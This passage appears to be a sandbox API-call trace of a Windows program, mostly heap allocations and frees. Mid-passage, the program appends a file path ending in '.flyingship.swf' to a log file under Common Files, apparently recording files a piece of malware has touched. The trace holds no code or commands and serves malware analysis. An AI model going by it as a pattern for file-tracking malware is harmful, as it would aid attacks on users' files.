dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.268] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x110) returned 0x907778 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0198.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0198.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.271] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.271] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.271] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0198.271] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.271] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.271] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0198.271] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3beb, lpOverlapped=0x0) returned 1 [0198.272] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0198.272] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3beb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.272] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0198.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.flyingship.swf\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0198.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x47) returned 0x9aa548 [0198.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.flyingship.swf\r\n", cchWideChar=71, lpMultiByteStr=0x9aa548, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.flyingship.swf\r\n", lpUsedDefaultChar=0x0) returned 71 [0198.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0198.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0198.272] WriteFile (in: hFile=0x158, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x46, lpOverlapped=0x0) returned 1 [0198.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0198.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.273] CloseHandle (hObject=0x158) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.274] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0198.274] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.276] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0198.276] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.276] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0198.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0198.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.276] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0198.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0198.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0198.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0198.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0198.277] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 